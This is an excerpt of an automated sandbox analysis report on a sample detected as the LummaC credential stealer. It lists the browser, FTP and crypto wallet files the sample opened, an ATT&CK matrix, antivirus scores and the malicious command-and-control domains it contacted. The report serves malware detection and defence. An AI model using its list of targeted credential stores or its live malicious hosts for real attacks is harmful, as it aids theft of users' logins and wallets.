              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: Yara matchFile source: 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1550688295.0000000000D32000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1579195348.0000000000D9E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1562333845.0000000000D32000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1565596801.0000000000D35000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1579279388.0000000000D3A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1577594379.0000000000D33000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: fghj.exe PID: 7372, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: fghj.exe PID: 7372, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Masquerading              		2
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts11
              Virtualization/Sandbox Evasion              		LSASS Memory131
              Security Software Discovery              		Remote Desktop Protocol4
              Data from Local System              		1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Native API              		Logon Script (Windows)Logon Script (Windows)11
              Deobfuscate/Decode Files or Information              		Security Account Manager11
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts1
              PowerShell              		Login HookLogin Hook3
              Obfuscated Files or Information              		NTDS2
              Process Discovery              		Distributed Component Object ModelInput Capture114
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading              		LSA Secrets24
              System Information Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              fghj.exe66%VirustotalBrowse
              fghj.exe61%ReversingLabsWin32.Exploit.LummaC

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://sputnik-1985.com/.msn100%Avira URL Cloudmalware
              https://sputnik-1985.com:443/api6Oa2x-M#100%Avira URL Cloudmalware
              https://sputnik-1985.com/apiob100%Avira URL Cloudmalware
              https://sputnik-1985.com/&0100%Avira URL Cloudmalware
              spellshagey.biz100%Avira URL Cloudmalware
              https://community.fastly.steaxU0%Avira URL Cloudsafe
              https://sputnik-1985.com:443/apiUSER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=100%Avira URL Cloudmalware
              https://sputnik-1985.com/apila100%Avira URL Cloudmalware
              http://ocsp.sectigo.com0&0%Avira URL Cloudsafe
              https://sputnik-1985.com/100%Avira URL Cloudmalware
              https://sputnik-1985.com/apibm100%Avira URL Cloudmalware
              https://sputnik-1985.com/04100%Avira URL Cloudmalware
              https://sputnik-1985.com/I3100%Avira URL Cloudmalware
              https://community.fastly.steamstatic.cohK0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              steamcommunity.com
              		104.102.49.254
              		truefalse
                		high
                s-part-0017.t-0009.fb-t-msedge.net
                		13.107.253.45
                		truefalse
                  		high
                  sputnik-1985.com
                  		104.21.96.1
                  		truefalse
                    		high
                    sordid-snaked.cyou
                    		unknown
                    		unknownfalse
                      		high
                      diffuculttan.xyz
                      		unknown
                      		unknownfalse
                        		high
                        effecterectz.xyz
                        		unknown
                        		unknownfalse
                          		high
                          spellshagey.biz
                          		unknown
                          		unknowntrue
                            		unknown
                            awake-weaves.cyou
                            		unknown
                            		unknownfalse
                              		high
                              immureprech.biz
                              		unknown
                              		unknownfalse
                                		high
                                wrathful-jammy.cyou
                                		unknown
                                		unknownfalse
                                  		high
                                  deafeninggeh.biz
                                  		unknown
                                  		unknownfalse
                                    		high
                                    debonairnukk.xyz
                                    		unknown
                                    		unknownfalse
                                      		high

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      sordid-snaked.cyoufalse
                                        		high
                                        deafeninggeh.bizfalse
                                          		high
                                          effecterectz.xyzfalse
                                            		high
                                            wrathful-jammy.cyoufalse
                                              		high
                                              https://sputnik-1985.com/apifalse
                                                		high
                                                https://steamcommunity.com/profiles/76561199724331900false
                                                  		high
                                                  awake-weaves.cyoufalse
                                                    		high
                                                    immureprech.bizfalse
                                                      		high
                                                      debonairnukk.xyzfalse
                                                        		high
                                                        spellshagey.biztrue
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        diffuculttan.xyzfalse
                                                          		high

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngfghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://duckduckgo.com/chrome_newtabfghj.exe, 00000000.00000003.1535169727.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1536020575.00000000039F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://player.vimeo.comfghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://duckduckgo.com/ac/?q=fghj.exe, 00000000.00000003.1535169727.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1536020575.00000000039F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#fghj.exefalse
                                                                    		high
                                                                    https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampfghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://steamcommunity.com/?subsection=broadcastsfghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000002.1614043108.0000000000D97000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://sputnik-1985.com/apiobfghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        https://store.steampowered.com/subscriber_agreement/fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.gstatic.cn/recaptcha/fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://sputnik-1985.com/.msnfghj.exe, 00000000.00000003.1535009883.0000000000D32000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: malware
                                                                            		unknown
                                                                            https://community.fastly.steamstatic.com/public/css/promo/summer201fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://sputnik-1985.com:443/api6Oa2x-M#fghj.exe, 00000000.00000003.1602739891.0000000000D3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              		unknown
                                                                              http://www.valvesoftware.com/legal.htmfghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.youtube.comfghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.google.comfghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://crl.sectigo.com/SectigoPublicCodeSigningCAEVE36.crl0fghj.exefalse
                                                                                      		high
                                                                                      https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackfghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6fghj.exe, 00000000.00000003.1522741143.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=englfghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://fpdownload.macromedia.com/get/flashplayer/update/current/install/install_all_win_fghj.exefalse
                                                                                                		high
                                                                                                https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englisfghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCfghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
